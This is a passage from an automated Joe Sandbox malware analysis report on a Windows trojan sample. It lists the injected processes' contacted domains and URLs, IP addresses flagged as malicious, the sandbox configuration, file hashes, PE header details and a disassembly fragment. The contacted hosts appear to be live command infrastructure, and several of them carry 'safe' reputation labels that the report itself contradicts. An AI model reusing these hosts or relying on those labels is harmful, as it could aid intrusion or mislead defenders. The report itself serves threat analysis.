                                              http://www.michellecaldwelldesign.comReferer:explorer.exe, 00000002.00000003.3096549318.000000000C8C7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3095821378.000000000C8AD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.4455815731.000000000C89C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3780333712.000000000C8B0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3095666547.000000000C899000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3780760636.000000000C8C7000.00000004.00000001.00020000.00000000.sdmpfalse
                                              • Avira URL Cloud: safe
                                              unknown
                                              http://www.flavorfog.online/vr01/www.bharatcrimecontrol24news.comexplorer.exe, 00000002.00000003.3096549318.000000000C8C7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3095821378.000000000C8AD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.4455815731.000000000C89C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3780333712.000000000C8B0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3095666547.000000000C899000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3780760636.000000000C8C7000.00000004.00000001.00020000.00000000.sdmpfalse
                                              • Avira URL Cloud: safe
                                              unknown
                                              http://www.topdeals.biz/vr01/explorer.exe, 00000002.00000003.3096549318.000000000C8C7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3095821378.000000000C8AD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.4455815731.000000000C89C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3780333712.000000000C8B0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3095666547.000000000C899000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3780760636.000000000C8C7000.00000004.00000001.00020000.00000000.sdmpfalse
                                              • Avira URL Cloud: safe
                                              unknown
                                              https://www.gratiasempirellc.com/comments/feedexplorer.exe, 00000002.00000002.4457850151.0000000010E7F000.00000004.80000000.00040000.00000000.sdmp, ipconfig.exe, 00000004.00000002.4448376202.000000000436F000.00000004.10000000.00040000.00000000.sdmpfalse
                                              • Avira URL Cloud: safe
                                              unknown
                                              http://www.topdeals.bizexplorer.exe, 00000002.00000003.3096549318.000000000C8C7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3095821378.000000000C8AD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.4455815731.000000000C89C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3780333712.000000000C8B0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3095666547.000000000C899000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3780760636.000000000C8C7000.00000004.00000001.00020000.00000000.sdmpfalse
                                              • Avira URL Cloud: safe
                                              unknown
                                              http://www.accidentapp.onlineexplorer.exe, 00000002.00000003.3096549318.000000000C8C7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3095821378.000000000C8AD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.4455815731.000000000C89C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3780333712.000000000C8B0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3095666547.000000000C899000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3780760636.000000000C8C7000.00000004.00000001.00020000.00000000.sdmpfalse
                                              • Avira URL Cloud: safe
                                              unknown
                                              http://www.laneflowlogistics.com/vr01/www.familyofficesheet.comexplorer.exe, 00000002.00000003.3096549318.000000000C8C7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3095821378.000000000C8AD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.4455815731.000000000C89C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3780333712.000000000C8B0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3095666547.000000000C899000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3780760636.000000000C8C7000.00000004.00000001.00020000.00000000.sdmpfalse
                                              • Avira URL Cloud: safe
                                              unknown
                                              http://www.kirtirefrigeration.com/vr01/explorer.exe, 00000002.00000003.3096549318.000000000C8C7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3095821378.000000000C8AD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.4455815731.000000000C89C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3780333712.000000000C8B0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3095666547.000000000C899000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3780760636.000000000C8C7000.00000004.00000001.00020000.00000000.sdmpfalse
                                              • Avira URL Cloud: safe
                                              unknown
                                              http://www.laneflowlogistics.com/vr01/explorer.exe, 00000002.00000003.3096549318.000000000C8C7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3095821378.000000000C8AD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.4455815731.000000000C89C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3780333712.000000000C8B0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3095666547.000000000C899000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3780760636.000000000C8C7000.00000004.00000001.00020000.00000000.sdmpfalse
                                              • Avira URL Cloud: safe
                                              unknown
                                              http://www.familyofficesheet.com/vr01/www.mayorii.comexplorer.exe, 00000002.00000003.3096549318.000000000C8C7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3095821378.000000000C8AD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.4455815731.000000000C89C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3780333712.000000000C8B0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3095666547.000000000C899000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3780760636.000000000C8C7000.00000004.00000001.00020000.00000000.sdmpfalse
                                              • Avira URL Cloud: safe
                                              unknown
                                              http://www.gratiasempirellc.com/vr01/explorer.exe, 00000002.00000003.3096549318.000000000C8C7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3095821378.000000000C8AD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.4455815731.000000000C89C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3780333712.000000000C8B0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3095666547.000000000C899000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3780760636.000000000C8C7000.00000004.00000001.00020000.00000000.sdmpfalse
                                              • Avira URL Cloud: safe
                                              unknown
                                              https://activity.windows.com/UserActivity.ReadWrite.CreatedByAppcrobat.exeexplorer.exe, 00000002.00000003.3096071926.000000000C50F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.4454886902.000000000C510000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3780399973.000000000C50F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.2005015223.000000000C4DC000.00000004.00000001.00020000.00000000.sdmpfalse
                                                high
                                                https://www.gratiasempirellc.com/xmlrpc.php?rsdexplorer.exe, 00000002.00000002.4457850151.0000000010E7F000.00000004.80000000.00040000.00000000.sdmp, ipconfig.exe, 00000004.00000002.4448376202.000000000436F000.00000004.10000000.00040000.00000000.sdmpfalse
                                                • Avira URL Cloud: safe
                                                unknown
                                                http://www.makeyousurprise.comReferer:explorer.exe, 00000002.00000003.3096549318.000000000C8C7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3095821378.000000000C8AD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.4455815731.000000000C89C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3780333712.000000000C8B0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3095666547.000000000C899000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3780760636.000000000C8C7000.00000004.00000001.00020000.00000000.sdmpfalse
                                                • Avira URL Cloud: safe
                                                unknown
                                                http://www.michellecaldwelldesign.com/vr01/www.accidentapp.onlineexplorer.exe, 00000002.00000003.3096549318.000000000C8C7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3095821378.000000000C8AD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.4455815731.000000000C89C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3780333712.000000000C8B0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3095666547.000000000C899000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3780760636.000000000C8C7000.00000004.00000001.00020000.00000000.sdmpfalse
                                                • Avira URL Cloud: safe
                                                unknown
                                                https://wns.windows.com/)sexplorer.exe, 00000002.00000000.1998453035.00000000099C0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.4451988670.00000000099C0000.00000004.00000001.00020000.00000000.sdmpfalse
                                                  high
                                                  http://www.autoitscript.com/autoit3/Jexplorer.exe, 00000002.00000002.4455332318.000000000C81C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3096004906.000000000C85F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.2005546585.000000000C81C000.00000004.00000001.00020000.00000000.sdmpfalse
                                                    high
                                                    http://www.nicholsonflooringservices.comexplorer.exe, 00000002.00000003.3096549318.000000000C8C7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3095821378.000000000C8AD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.4455815731.000000000C89C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3780333712.000000000C8B0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3095666547.000000000C899000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3780760636.000000000C8C7000.00000004.00000001.00020000.00000000.sdmpfalse
                                                    • Avira URL Cloud: safe
                                                    unknown
                                                    http://www.helyibudapest.comexplorer.exe, 00000002.00000003.3096549318.000000000C8C7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3095821378.000000000C8AD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.4455815731.000000000C89C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3780333712.000000000C8B0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3095666547.000000000C899000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3780760636.000000000C8C7000.00000004.00000001.00020000.00000000.sdmpfalse
                                                    • Avira URL Cloud: safe
                                                    unknown
                                                    http://www.makeyousurprise.comexplorer.exe, 00000002.00000003.3096549318.000000000C8C7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3095821378.000000000C8AD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.4455815731.000000000C89C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3780333712.000000000C8B0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3095666547.000000000C899000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3780760636.000000000C8C7000.00000004.00000001.00020000.00000000.sdmpfalse
                                                    • Avira URL Cloud: phishing
                                                    unknown
                                                    http://www.yesxoit.xyz/vr01/explorer.exe, 00000002.00000003.3096549318.000000000C8C7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3095821378.000000000C8AD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.4455815731.000000000C89C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3780333712.000000000C8B0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3095666547.000000000C899000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3780760636.000000000C8C7000.00000004.00000001.00020000.00000000.sdmpfalse
                                                    • Avira URL Cloud: safe
                                                    unknown
                                                    http://www.topdeals.bizReferer:explorer.exe, 00000002.00000003.3096549318.000000000C8C7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3095821378.000000000C8AD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.4455815731.000000000C89C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3780333712.000000000C8B0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3095666547.000000000C899000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3780760636.000000000C8C7000.00000004.00000001.00020000.00000000.sdmpfalse
                                                    • Avira URL Cloud: safe
                                                    unknown
                                                    https://api.w.org/explorer.exe, 00000002.00000002.4457850151.0000000010E7F000.00000004.80000000.00040000.00000000.sdmp, ipconfig.exe, 00000004.00000002.4448376202.000000000436F000.00000004.10000000.00040000.00000000.sdmpfalse
                                                      high
                                                      http://www.yoursweets.onlineReferer:explorer.exe, 00000002.00000003.3096549318.000000000C8C7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3095821378.000000000C8AD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.4455815731.000000000C89C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3780333712.000000000C8B0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3095666547.000000000C899000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3780760636.000000000C8C7000.00000004.00000001.00020000.00000000.sdmpfalse
                                                      • Avira URL Cloud: safe
                                                      unknown
                                                      http://www.bharatcrimecontrol24news.comReferer:explorer.exe, 00000002.00000003.3096549318.000000000C8C7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3095821378.000000000C8AD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.4455815731.000000000C89C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3780333712.000000000C8B0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3095666547.000000000C899000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3780760636.000000000C8C7000.00000004.00000001.00020000.00000000.sdmpfalse
                                                      • Avira URL Cloud: safe
                                                      unknown
                                                      http://www.yesxoit.xyzReferer:explorer.exe, 00000002.00000003.3096549318.000000000C8C7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3095821378.000000000C8AD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.4455815731.000000000C89C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3780333712.000000000C8B0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3095666547.000000000C899000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3780760636.000000000C8C7000.00000004.00000001.00020000.00000000.sdmpfalse
                                                      • Avira URL Cloud: safe
                                                      unknown
                                                      https://www.gratiasempirellc.com/wp-json/explorer.exe, 00000002.00000002.4457850151.0000000010E7F000.00000004.80000000.00040000.00000000.sdmp, ipconfig.exe, 00000004.00000002.4448376202.000000000436F000.00000004.10000000.00040000.00000000.sdmpfalse
                                                      • Avira URL Cloud: safe
                                                      unknown
                                                      http://www.flavorfog.onlineReferer:explorer.exe, 00000002.00000003.3096549318.000000000C8C7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3095821378.000000000C8AD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.4455815731.000000000C89C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3780333712.000000000C8B0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3095666547.000000000C899000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3780760636.000000000C8C7000.00000004.00000001.00020000.00000000.sdmpfalse
                                                      • Avira URL Cloud: safe
                                                      unknown
                                                      https://outlook.comexplorer.exe, 00000002.00000003.3779046751.0000000009D42000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3094901918.0000000009BAA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3094735270.0000000009B85000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.4452831874.0000000009C96000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.1998453035.0000000009B8A000.00000004.00000001.00020000.00000000.sdmpfalse
                                                        high
                                                        http://www.gratiasempirellc.com/wp-content/themes/business-identity-mvp/style.css?ver=6.4.3explorer.exe, 00000002.00000002.4457850151.0000000010E7F000.00000004.80000000.00040000.00000000.sdmp, ipconfig.exe, 00000004.00000002.4448376202.000000000436F000.00000004.10000000.00040000.00000000.sdmpfalse
                                                        • Avira URL Cloud: safe
                                                        unknown
                                                        http://www.laneflowlogistics.comexplorer.exe, 00000002.00000003.3096549318.000000000C8C7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3095821378.000000000C8AD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.4455815731.000000000C89C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3780333712.000000000C8B0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3095666547.000000000C899000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3780760636.000000000C8C7000.00000004.00000001.00020000.00000000.sdmpfalse
                                                        • Avira URL Cloud: safe
                                                        unknown
                                                        http://www.mayorii.com/vr01/www.flavorfog.onlineexplorer.exe, 00000002.00000003.3096549318.000000000C8C7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3095821378.000000000C8AD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.4455815731.000000000C89C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3780333712.000000000C8B0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3095666547.000000000C899000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3780760636.000000000C8C7000.00000004.00000001.00020000.00000000.sdmpfalse
                                                        • Avira URL Cloud: safe
                                                        unknown
                                                        http://www.bharatcrimecontrol24news.comexplorer.exe, 00000002.00000003.3096549318.000000000C8C7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3095821378.000000000C8AD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.4455815731.000000000C89C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3780333712.000000000C8B0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3095666547.000000000C899000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3780760636.000000000C8C7000.00000004.00000001.00020000.00000000.sdmpfalse
                                                        • Avira URL Cloud: safe
                                                        unknown
                                                        http://www.gratiasempirellc.com/vr01/www.laneflowlogistics.comexplorer.exe, 00000002.00000003.3096549318.000000000C8C7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3095821378.000000000C8AD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.4455815731.000000000C89C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3780333712.000000000C8B0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3095666547.000000000C899000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3780760636.000000000C8C7000.00000004.00000001.00020000.00000000.sdmpfalse
                                                        • Avira URL Cloud: safe
                                                        unknown
                                                        http://www.nicholsonflooringservices.com/vr01/www.hsyxkj.comexplorer.exe, 00000002.00000003.3096549318.000000000C8C7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3095821378.000000000C8AD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.4455815731.000000000C89C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3780333712.000000000C8B0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3095666547.000000000C899000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3780760636.000000000C8C7000.00000004.00000001.00020000.00000000.sdmpfalse
                                                        • Avira URL Cloud: safe
                                                        unknown
IP | Domain | Country | ASN | ASN Name | Malicious
35.214.118.179 | www.flavorfog.online | United States | 19527 | GOOGLE-2US | true
76.223.105.230 | laneflowlogistics.com | United States | 16509 | AMAZON-02US | true
45.88.201.15 | gratiasempirellc.com | Switzerland | 54574 | DMITUS | true
34.149.87.45 | td-ccm-neg-87-45.wixdns.net | United States | 2686 | ATGS-MMD-ASUS | true
104.16.36.105 | www.familyofficesheet.com | United States | 13335 | CLOUDFLARENETUS | true
3.33.130.190 | accidentapp.online | United States | 8987 | AMAZONEXPANSIONGB | true
69.57.172.11 | bharatcrimecontrol24news.com | United States | 25653 | FORTRESSITXUS | true
72.14.185.43 | www.topdeals.biz | United States | 63949 | LINODE-APLinodeLLCUS | true
Joe Sandbox version: 40.0.0 Tourmaline
Analysis ID: 1410996
Start date and time: 2024-03-18 14:41:54 +01:00
Joe Sandbox product: CloudBasic
Overall analysis duration: 0h 10m 6s
Hypervisor based Inspection enabled: false
Report type: full
Cookbook file name: default.jbs
Analysis system description: Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed: 8
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 1
Technologies:
• HCA enabled
• EGA enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Sample name: i5NDVAFg42.exe (renamed because original name is a hash value)
Original Sample Name: d0b94b855d2f24add1edf6b3a6ecae24e4366f181a1ccd0bcd3b27e94de95bc0.exe
Detection: MAL
Classification: mal100.troj.evad.winEXE@8/0@11/8
EGA Information:
• Successful, ratio: 100%
HCA Information:
• Successful, ratio: 100%
• Number of executed functions: 34
• Number of non-executed functions: 314
Cookbook Comments:
• Found application associated with file extension: .exe
• Override analysis time to 240000 for current running targets taking high CPU consumption
• Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe
• Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
• HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
• Not all processes were analyzed, report is missing behavior information
• Report creation exceeded maximum time and may have missing disassembly code information.
• Report size exceeded maximum capacity and may have missing disassembly code.
• Report size getting too big, too many NtEnumerateKey calls found.
• Report size getting too big, too many NtOpenKey calls found.
• Report size getting too big, too many NtOpenKeyEx calls found.
• Report size getting too big, too many NtQueryValueKey calls found.
• VT rate limit hit for: i5NDVAFg42.exe
Time | Type | Description
14:42:40 | API Interceptor | 7710614x Sleep call for process: explorer.exe modified
14:43:24 | API Interceptor | 7664165x Sleep call for process: ipconfig.exe modified
                                                            hyWl33Q2OI.elfGet hashmaliciousUnknownBrowse
                                                            • 54.215.193.208
                                                            7InjeWQVHC.elfGet hashmaliciousUnknownBrowse
                                                            • 13.62.27.211
                                                            PD1Afd15RS.elfGet hashmaliciousMiraiBrowse
                                                            • 34.208.242.223
                                                            FoDoFx0t5a.elfGet hashmaliciousMiraiBrowse
                                                            • 13.114.216.30
                                                            xFe4GHvmqU.elfGet hashmaliciousUnknownBrowse
                                                            • 54.118.15.109
                                                            QEMy2mlwhJ.elfGet hashmaliciousMiraiBrowse
                                                            • 54.183.198.10
                                                            No context
                                                            No context
                                                            No created / dropped files found
File type: PE32 executable (GUI) Intel 80386, for MS Windows
Entropy (8bit): 7.394530119709165
TrID:
• Win32 Executable (generic) a (10002005/4) 99.98%
• DOS Executable Generic (2002/1) 0.02%
File name: i5NDVAFg42.exe
File size: 185'856 bytes
MD5: 728b83244a275ef0e29cb00aa0c6692c
SHA1: 8f744b5564e78ab054bc685bd12483c1ffd9de4d
SHA256: d0b94b855d2f24add1edf6b3a6ecae24e4366f181a1ccd0bcd3b27e94de95bc0
SHA512: dfee5c83bd2973362875bee76c688b81f191927a0e21eb104791577d79de110ea9912b4c35e65a46808309c02c1be6c1c181699491edcd19517901d53d0c4da5
SSDEEP: 3072:CtzMC+k7U9fY/0/13Uay9AGYKolYE6upZ44YW5Q/T74PMu57c:o4HZU96RKolYLKm4oYPJ
TLSH: EF04AF36D642C071E2B212B5F6BD1B7B483D0E353295A0AAA3E215E06EE05E5F53D31F
File Content Preview: MZER.....X.......<......(...............................................!..L.!This program cannot be run in DOS mode....$.............f...f...f.......f.......f.......f.Rich..f.................PE..L...%.0:............................ ......................
Icon Hash: 00928e8e8686b000
Entrypoint: 0x2ff120
Entrypoint Section: .text
Digitally signed: false
Imagebase: 0x2e0000
Subsystem: windows gui
Image File Characteristics: EXECUTABLE_IMAGE, 32BIT_MACHINE
DLL Characteristics: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
Time Stamp: 0x3A30A325 [Fri Dec 8 09:00:21 2000 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major: 5
OS Version Minor: 1
File Version Major: 5
File Version Minor: 1
Subsystem Version Major: 5
Subsystem Version Minor: 1
Import Hash:
                                                            Instruction
                                                            push ebp
                                                            mov ebp, esp
                                                            sub esp, 64h
                                                            call 00007F13D87C24CAh
                                                            mov esp, ebp
                                                            pop ebp
                                                            ret
                                                            call 00007F13D87C5C85h
                                                            pop eax
                                                            ret
                                                            call 00007F13D87C5C85h
                                                            pop eax
                                                            ret
                                                            call 00007F13D87C2513h
                                                            ret
                                                            call 00007F13D87C5C85h
                                                            pop eax
                                                            ret
                                                            jmp 00007F13D87C2576h
                                                            ret
                                                            call 00007F13D87C5C85h
                                                            pop eax
                                                            ret
                                                            push 88888888h
                                                            jmp 00007F13D87C3EE4h
                                                            ret
                                                            call 00007F13D87C5C85h
                                                            pop eax
                                                            ret
                                                            push 88888888h
                                                            jmp 00007F13D87C3EE7h
                                                            ret
                                                            call 00007F13D87C5C85h
                                                            pop eax
                                                            ret
                                                            push 88888888h
                                                            jmp 00007F13D87C3EEAh
                                                            ret
                                                            call 00007F13D87C5C85h
                                                            pop eax
                                                            ret
                                                            push 88888888h
                                                            jmp 00007F13D87C3EEDh
                                                            ret
                                                            call 00007F13D87C5C85h
                                                            pop eax
                                                            ret
                                                            push 88888888h
                                                            jmp 00007F13D87C3EF0h
                                                            ret
                                                            call 00007F13D87C5C85h
                                                            pop eax
                                                            ret
                                                            push 88888888h
                                                            jmp 00007F13D87C3EF3h
                                                            ret
                                                            call 00007F13D87C5C85h
                                                            pop eax
                                                            ret
                                                            push 88888888h
                                                            jmp 00007F13D87C3EF6h
                                                            ret
                                                            call 00007F13D87C5C85h
                                                            pop eax
                                                            ret
                                                            push 88888888h
                                                            jmp 00007F13D87C3EF9h
                                                            ret
                                                            call 00007F13D87C5C85h
                                                            pop eax
                                                            ret
                                                            Programming Language:
                                                            • [C++] VS2010 SP1 build 40219
                                                            • [ASM] VS2010 SP1 build 40219
                                                            • [LNK] VS2010 SP1 build 40219
Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IAT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
